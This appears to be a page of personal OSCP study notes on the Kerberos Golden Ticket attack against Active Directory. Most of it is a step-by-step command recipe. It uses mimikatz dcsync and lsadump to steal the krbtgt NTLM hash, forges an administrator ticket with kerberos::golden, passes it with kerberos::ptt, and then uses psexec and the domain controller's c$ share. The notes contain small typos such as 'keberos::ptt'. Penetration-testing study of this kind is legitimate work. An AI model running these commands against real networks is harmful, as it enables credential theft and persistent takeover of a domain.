OSCP Notes
Comment on page

Golden Ticket

Check if you're in the right priv
psexec.exe \\dc_name cmd.exe
if this won't work then this won't work.
What you need:
  1. 1.
    Domain name:
  2. 2.
whoami /user
3. KRBTGT NTLM Hash: (requires elevated priv) -> if we can obtain this, we can create our own TGT
  • non-priv user is the member of the Domain Admin's group ---> DC will trust it if encrypted correctly
  • The password hash doesn't change automatically, meaning there's a good chance that the old tickets are somewhere in the system!
run mimikatz
dcsync /domain:domainname.local /user:krbtgt
lsadump::lsa /patch
copy Hash NTLM value.
Use golden ticket to get an access to a domain group with the information you got!
on mimikatz command,
kerberos::golden /domain:domain.local /sid:SID_Value /rc4:NTLM_HASH /id:500 /user:gori
  • id value- pass in the id that you want to create an account for -> 500 - admin
  • /user -> name it whatever!
After you create an account, pass the ticket
keberos::ptt ticket.kirbi
if you launch a command prompt now
you will have priv of admin! You can access domain controllers file shares (and it doesn't expire for a long time!!!)
pushd \\domain_Controller\c$
psexec.exe \\dc01 cmd.exe
to launch a command prompt with the newly created DC account.
check your group memberships
whoami /groups